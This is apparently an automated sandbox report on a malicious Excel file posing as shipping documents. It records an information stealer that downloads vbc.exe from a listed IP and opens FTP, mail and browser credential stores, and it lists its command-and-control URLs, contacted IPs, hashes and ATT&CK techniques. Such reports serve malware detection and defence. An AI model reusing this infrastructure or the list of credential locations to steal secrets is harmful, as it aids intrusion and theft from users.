              Source: C:\Users\Public\vbc.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
              Source: C:\Users\Public\vbc.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
              Source: C:\Users\Public\vbc.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
              Tries to steal Mail credentials (via file registry)Show sources
              Source: C:\Users\Public\vbc.exeCode function: PopPassword
              Source: C:\Users\Public\vbc.exeCode function: SmtpPassword
              Tries to steal Mail credentials (via file access)Show sources
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
              Tries to harvest and steal browser information (history, passwords, etc)Show sources
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
              Source: Yara matchFile source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.vbc.exe.3e0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsExploitation for Client Execution13Path InterceptionAccess Token Manipulation1Deobfuscate/Decode Files or Information1OS Credential Dumping2Account Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer13Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection12Obfuscated Files or Information3Credentials in Registry2File and Directory Discovery2Remote Desktop ProtocolMan in the Browser1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Software Packing22Security Account ManagerSystem Information Discovery13SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Masquerading111NTDSSecurity Software Discovery1Distributed Component Object ModelEmail Collection1Scheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion11LSA SecretsProcess Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonAccess Token Manipulation1Cached Domain CredentialsVirtualization/Sandbox Evasion11VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection12DCSyncSystem Owner/User Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              No Antivirus matches

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              4.2.vbc.exe.220e50.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              4.2.vbc.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              4.1.vbc.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              4.3.vbc.exe.3e0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.%s.comPA0%URL Reputationsafe
              http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
              http://alphastand.win/alien/fre.php0%URL Reputationsafe
              http://alphastand.trade/alien/fre.php0%URL Reputationsafe
              http://checkvim.com/ga14/fre.php100%Avira URL Cloudmalware
              http://103.155.83.184/wdc/vbc.exe0%Avira URL Cloudsafe
              http://alphastand.top/alien/fre.php0%URL Reputationsafe
              http://www.ibsensoftware.com/0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              checkvim.com
              		5.188.89.50
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://kbfvzoboss.bid/alien/fre.phptrue
                • URL Reputation: safe
                		unknown
                http://alphastand.win/alien/fre.phptrue
                • URL Reputation: safe
                		unknown
                http://alphastand.trade/alien/fre.phptrue
                • URL Reputation: safe
                		unknown
                http://checkvim.com/ga14/fre.phptrue
                • Avira URL Cloud: malware
                		unknown
                http://103.155.83.184/wdc/vbc.exetrue
                • Avira URL Cloud: safe
                		unknown
                http://alphastand.top/alien/fre.phptrue
                • URL Reputation: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.%s.comPAvbc.exe, 00000004.00000002.664629094.0000000002700000.00000002.00020000.sdmpfalse
                • URL Reputation: safe
                		low
                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000004.00000002.664629094.0000000002700000.00000002.00020000.sdmpfalse
                  		high
                  http://www.day.com/dam/1.089D14D5A.emf.0.drfalse
                    		high
                    http://www.ibsensoftware.com/vbc.exe, vbc.exe, 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmpfalse
                    • URL Reputation: safe
                    		unknown

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    5.188.89.50
                    		checkvim.comRussian Federation
                    		34665PINDC-ASRUtrue
                    103.155.83.184
                    		unknownunknown
                    		134687TWIDC-AS-APTWIDCLimitedHKtrue

                    General Information

                    Joe Sandbox Version:33.0.0 White Diamond
                    Analysis ID:491904
                    Start date:28.09.2021
                    Start time:06:49:13
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 5m 38s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:Original shipping documents.xlsx
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:6
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.spyw.expl.evad.winXLSX@4/15@142/2
                    EGA Information:Failed
                    HDC Information:
                    • Successful, ratio: 42.6% (good quality ratio 40.8%)
                    • Quality average: 77.2%
                    • Quality standard deviation: 28.8%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .xlsx
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Scroll down
                    • Close Viewer
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                    • HTTP Packets have been reduced
                    • TCP Packets have been reduced to 100
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    06:50:35API Interceptor72x Sleep call for process: EQNEDT32.EXE modified
                    06:50:43API Interceptor837x Sleep call for process: vbc.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    103.155.83.184Original_Docs_of_272108-27110.xlsxGet hashmaliciousBrowse
                    • 103.155.83.184/winx/vbc.exe
                    Original Docs of 272108-27110.xlsxGet hashmaliciousBrowse
                    • 103.155.83.184/winx/vbc.exe

                    Domains

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    checkvim.comOriginal_Docs_of_272108-27110.xlsxGet hashmaliciousBrowse
                    • 85.192.56.15
                    oGBfcIhLM0.exeGet hashmaliciousBrowse
                    • 85.192.56.15
                    Original Docs of 272108-27110.xlsxGet hashmaliciousBrowse
                    • 85.192.56.15
                    4jiyRFGk2g.exeGet hashmaliciousBrowse
                    • 85.192.56.15
                    2WcXz6F1Fg.exeGet hashmaliciousBrowse
                    • 94.247.137.137
                    WjOPMprn5p.exeGet hashmaliciousBrowse
                    • 94.247.137.137
                    u2dPHHMOK8.exeGet hashmaliciousBrowse
                    • 94.247.137.137
                    _(BL,INV,)Cargo receipts_.xlsxGet hashmaliciousBrowse
                    • 176.119.147.198
                    f32OEHkj7R.exeGet hashmaliciousBrowse
                    • 94.247.137.151
                    KXaSOvIYKB.exeGet hashmaliciousBrowse
                    • 94.247.137.151
                    Revised Proforma Twinkle diamond..xlsxGet hashmaliciousBrowse
                    • 94.247.137.151
                    kCqS8blL7C.exeGet hashmaliciousBrowse
                    • 5.180.136.169
                    qucqDCe82D.exeGet hashmaliciousBrowse
                    • 5.180.136.169
                    xbFyi3wvv6.exeGet hashmaliciousBrowse
                    • 5.180.136.169
                    SWSJZS3u3T.exeGet hashmaliciousBrowse
                    • 5.180.136.169
                    vbc.exeGet hashmaliciousBrowse
                    • 5.180.136.169
                    hBU2Qo8plP.exeGet hashmaliciousBrowse
                    • 185.195.24.226
                    _Cargo receipts BL,INV_.xlsxGet hashmaliciousBrowse
                    • 185.195.24.226
                    lse63kj8fX.exeGet hashmaliciousBrowse
                    • 185.251.89.218
                    MqfdQNyVU9.exeGet hashmaliciousBrowse
                    • 185.251.89.218

                    ASN

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    TWIDC-AS-APTWIDCLimitedHKOriginal_Docs_of_272108-27110.xlsxGet hashmaliciousBrowse
                    • 103.155.83.184
                    Original Docs of 272108-27110.xlsxGet hashmaliciousBrowse
                    • 103.155.83.184
                    A4B51BD72DFFD28AD3841217FFEC9E43D21EE3C6F889B.exeGet hashmaliciousBrowse
                    • 103.155.93.196
                    05BB79760B2D993C39D526717DA95AEC99AD74D8FC23E.exeGet hashmaliciousBrowse
                    • 103.155.93.196
                    setup_x86_x64_install.exeGet hashmaliciousBrowse
                    • 103.155.93.196
                    AA9830B26F9C0DB4C3DA3C04A96199550B57251B56F8C.exeGet hashmaliciousBrowse
                    • 103.155.93.196
                    IYtpAQqaaN.exeGet hashmaliciousBrowse
                    • 103.155.93.196
                    s5A7MjLIUaGet hashmaliciousBrowse
                    • 103.155.241.218
                    AWS QOUTATION 768854_SCAN_PDF.exeGet hashmaliciousBrowse
                    • 103.156.92.178
                    IH8yGKHMaAGet hashmaliciousBrowse
                    • 103.154.227.106
                    doc0490192021092110294.exeGet hashmaliciousBrowse
                    • 103.159.52.4
                    AW QUOTE HQ2-scan-0983.exeGet hashmaliciousBrowse
                    • 103.156.92.178
                    Document_1752244602-Copy.xlsGet hashmaliciousBrowse
                    • 103.155.92.211
                    Document_1752244602-Copy.xlsGet hashmaliciousBrowse
                    • 103.155.92.211
                    Document_1752244602-Copy.xlsGet hashmaliciousBrowse
                    • 103.155.92.211
                    AW QUOTE 21505 HQ1-Scan-068703_PDF.exeGet hashmaliciousBrowse
                    • 103.156.92.178
                    AW QUOTE 21505 HQ1-Scan-068703_PDF.exeGet hashmaliciousBrowse
                    • 103.156.92.178
                    qbot5.xlsxGet hashmaliciousBrowse
                    • 103.155.92.211
                    qbot5.xlsxGet hashmaliciousBrowse
                    • 103.155.92.211
                    qbot5.xlsxGet hashmaliciousBrowse
                    • 103.155.92.211
                    PINDC-ASRUSetup.exeGet hashmaliciousBrowse
                    • 5.188.89.12
                    6MC579H2Rk.exeGet hashmaliciousBrowse
                    • 5.188.88.214
                    ulWBwQ4cF0.exeGet hashmaliciousBrowse
                    • 5.188.88.214
                    TpW0kSiexY.exeGet hashmaliciousBrowse
                    • 146.185.239.48
                    t2fi2uDNOmGet hashmaliciousBrowse
                    • 5.188.210.153
                    mk61kzqC1Z.exeGet hashmaliciousBrowse
                    • 5.188.89.24
                    de8d7941d5fe91459cefc134f86c2630dbea5ec6830e2.exeGet hashmaliciousBrowse
                    • 5.188.89.24
                    w3hJTUzSUs.exeGet hashmaliciousBrowse
                    • 5.188.89.24
                    Q3 order 455647483 10-09-2021 document.exeGet hashmaliciousBrowse
                    • 31.184.204.91
                    z2SUzJkpaW.exeGet hashmaliciousBrowse
                    • 5.188.88.47
                    v6w61X9rOS.exeGet hashmaliciousBrowse
                    • 5.188.88.47
                    yXf9mhlpKV.exeGet hashmaliciousBrowse
                    • 5.188.88.47
                    hkfp0p5kuE.exeGet hashmaliciousBrowse
                    • 5.188.88.63
                    3hTS09wZ7G.exeGet hashmaliciousBrowse
                    • 5.188.88.63
                    040ba58b824e36fc9117c1e3c8b651d9e4dc3fe12b535.exeGet hashmaliciousBrowse
                    • 5.188.88.63
                    89o9iHBGiB.exeGet hashmaliciousBrowse
                    • 5.188.88.63
                    DWVByMCYL8.exeGet hashmaliciousBrowse
                    • 5.188.88.63
                    DUpgpAnHkq.exeGet hashmaliciousBrowse
                    • 5.188.88.63
                    7EAz8cQ49v.exeGet hashmaliciousBrowse
                    • 5.188.88.63
                    f9aoawyl4M.exeGet hashmaliciousBrowse
                    • 5.188.88.63

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:downloaded
                    Size (bytes):210432
                    Entropy (8bit):6.97232515193582
                    Encrypted:false
                    SSDEEP:3072:2v+ArX9FLxOhanZBsX3PovEuKwEXLqfP6GB6klGfLIQVNWBz:6+KnIanZyHPoqqfSGB6k8Txql
                    MD5:59A67B5CCF01B6A564265797DC5E53E8
                    SHA1:996281D368FCC2CEFE5BF99399CCB19299C6F8FF
                    SHA-256:E4C1C0121487F83B014B8C81BBAF03DB0B7F49584A268A5E67CA64BA6E64676F
                    SHA-512:3BEB988E323C9A9F8DEB04E845DA157E34EC1F564B5CF8681A7ACA490A9FB5A1D4F1D4A10D80AD2D9C7D1742C56B93CFD113352FA80E38C4BAB46695C6F527CD
                    Malicious:true
                    Reputation:low
                    IE Cache URL:http://103.155.83.184/wdc/vbc.exe
                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L...H..`.................l........................@.................................mk..................................O...,...<.... ...u..............................................................@...............|............................text... j.......l.................. ..`.rdata...1.......2...p..............@..@.data...|U..........................@....rsrc....u... ...v..................@..@........................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1599A1F2.jpeg
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                    Category:dropped
                    Size (bytes):8815
                    Entropy (8bit):7.944898651451431
                    Encrypted:false
                    SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                    MD5:F06432656347B7042C803FE58F4043E1
                    SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                    SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                    SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\34C1CE78.jpeg
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                    Category:dropped
                    Size (bytes):14198
                    Entropy (8bit):7.916688725116637
                    Encrypted:false
                    SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                    MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                    SHA1:72CA86D260330FC32246D28349C07933E427065D
                    SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                    SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FC47675.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):33795
                    Entropy (8bit):7.909466841535462
                    Encrypted:false
                    SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
                    MD5:613C306C3CC7C3367595D71BEECD5DE4
                    SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
                    SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
                    SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\46679E8F.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 484 x 544, 8-bit/color RGB, non-interlaced
                    Category:dropped
                    Size (bytes):65050
                    Entropy (8bit):7.959940260382877
                    Encrypted:false
                    SSDEEP:1536:LT3dRSPKeePekFnfpQ6uF2sxiPfqu2RjWn0ZqNnbMXrpLlx6q1F:fdoPI79fpQXtjupn7Nnb8pLll
                    MD5:22335141D285E599CDAEF99EABA59D5B
                    SHA1:C8E5F6F30E91F2C55D96867CAA2D1E21E7A4804D
                    SHA-256:6C0757667F548698B721E4D723768447046B509C1777D6F1474BDE45649D92B0
                    SHA-512:CF623DC74B631AAE3DBECF1F8D7E6E129F0C44F882487F367F4CB955A3D5A9AAE96EFD77FB0843BCE84F5F9D4A3C844A42193B7C4F1D374CE147399E1C3A6C2B
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: .PNG........IHDR....... ......]....b.zTXtRaw profile type exif..x..Y..8.].9.........L3....UFvU&.d..|q.;..f..^...........j.W..^...RO=..C.....=......N..).._......=........./...........?....Cl.>.......7...~....'..<...W..{o......q..5~..O.;U.ce>.W.Oxn...-.O......w..I........v..s&.|x....:......?..u.??P....y.....}q..'..}.?...........}.j..o...I...K......G.._+.U...?..W..+Nnlq.....z....RX.._...3L.1..9.........8.$.._.\....Ln....%.....fh|...d.|X.7........_....StC......+*.<.7...S\H...i>.{...Nn....../.....#..d.9...s.N..S.P...........Kxr(.1..8....<y|R..@.9.p}......E.....l......"?.Ui....RF~jj.....s...{~.SR..Z.Qo}j...Zk....i..VZm......LX......./..../?.#.g..G.u...;...f.e..f...Y..*.^.....6.................}.{.vk............[...........G..I.....7^...:zgw.)Eo.;.{D)r..B.rV....C._....us..]9...[..n...._...........sk.=..9...z...a......e.7.<Vm;....s.w....o./kq.y.w..:q`;..A({.}...w~<.S..WJ.).Zz.c.#`.xN...1.9..1...k.o. ..-.M|....,..i.[.\.;......8...x.
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\58670744.jpeg
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                    Category:dropped
                    Size (bytes):14198
                    Entropy (8bit):7.916688725116637
                    Encrypted:false
                    SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                    MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                    SHA1:72CA86D260330FC32246D28349C07933E427065D
                    SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                    SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                    Malicious:false
                    Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6C7DD346.jpeg
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                    Category:dropped
                    Size (bytes):8815
                    Entropy (8bit):7.944898651451431
                    Encrypted:false
                    SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                    MD5:F06432656347B7042C803FE58F4043E1
                    SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                    SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                    SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                    Malicious:false
                    Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\89D14D5A.emf
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):648132
